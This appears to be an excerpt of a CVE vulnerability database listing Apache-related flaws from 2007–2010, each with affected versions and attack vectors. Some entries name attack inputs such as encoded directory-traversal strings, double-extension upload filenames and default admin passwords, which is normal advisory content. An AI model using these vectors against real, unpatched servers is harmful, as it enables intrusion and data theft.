12603| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
12604| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
12605| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
12606| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
12607| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
12608| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
12609| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
12610| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
12611| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
12612| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
12613| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
12614| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
12615| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
12616| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
12617| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
12618| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
12619| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
12620| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
12621| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
12622| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
12623| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
12624| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
12625| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
12626| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
12627| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12628| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
12629| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
12630| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
12631| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
12632| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
12633| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
12634| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
12635| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
12636| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
12637| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
12638| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
12639| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
12640| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
12641| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
12642| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
12643| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
12644| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
12645| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
12646| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
12647| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
12648| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
12649| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
12650| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
12651| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
12652| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
12653| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
12654| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
